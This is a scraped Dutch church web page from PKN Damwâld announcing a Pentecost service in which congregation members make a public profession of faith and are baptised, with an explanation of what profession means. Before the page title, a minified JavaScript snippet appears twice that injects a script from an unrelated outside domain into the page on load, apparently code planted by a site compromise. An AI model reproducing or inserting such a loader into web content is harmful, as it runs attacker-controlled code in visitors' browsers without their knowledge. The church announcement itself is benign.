;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Openbare Belijdenis & doop in De Ontmoeting - PKN Damwâld

Openbare Belijdenis & doop in De Ontmoeting

Gepubliceerd op: maandag 14 mei 2018

Komende zondag – eerste Pinksterdag – zullen een groot aantal gemeenteleden van Gereformeerd Damwâld belijdenis afleggen van hun geloof.  Deze feestelijke viering zal plaatsvinden in de morgendienst om 09.30 uur in de Ontmoeting. In deze dienst zullen ook een aantal gemeenteleden de Heilige Doop ontvangen. Voorganger in de dienst is ds. S. Boukes.

In het christelijk geloof gaat het voornamelijk om het hebben met een relatie met Jezus Christus. Je betrekt hem in alle dingen van het leven. In het christelijk geloof kun je ook beamen dat God als mens naar de wereld is toegekomen in de persoon Jezus en dat de Heilige Geest jou helpt te geloven. Het besluit om gedoopt te willen zijn of belijdenis te doen markeert eigenlijk iets dat je zelf gelooft. Je laat daarmee aan anderen zien waar jij voor staat. God heeft allang “ja” tegen jou gezegd. Met een doop en belijdenis zeg je in het openbaar ook “ja” tegen Hem. Wat zou jou tegenhouden om “ja” tegen Hem te zeggen

Belijdenis doen is je geloof hardop belijden, zeggen wat je gelooft. Je vertelt openlijk in de kerk dat je gelooft in God de Vader, de Zoon, die zegt: ‘heb elkaar lief’ en in de Heilige Geest die ons inspireert om te leven en te geloven. Je belooft ook dat je God wil dienen in je leven en dat je mee wilt doen aan de opbouw van onze gemeente. Dat is zeker niet zomaar iets, het is een grote belofte die je aflegt. Het is ook een intentie waar we samen, als gemeente aan werken en over nadenken in de diensten. Aan de belijdenis gaat een tijd van voorbereiding vooraf, samen met predikant en anderen die belijdenis willen doen praat je over belangrijke thema’s van het Christelijk geloof. In de dienst waarin je bevestigd wordt, worden ook vragen gesteld en door een ‘ja’ van jou en later in de dienst ook van de hele gemeente laat iedereen hardop horen dat hij of zij ermee instemt.

Wij willen hen van harte in de voorbede van de gemeente aanbevelen en zien uit naar een gezegende dienst.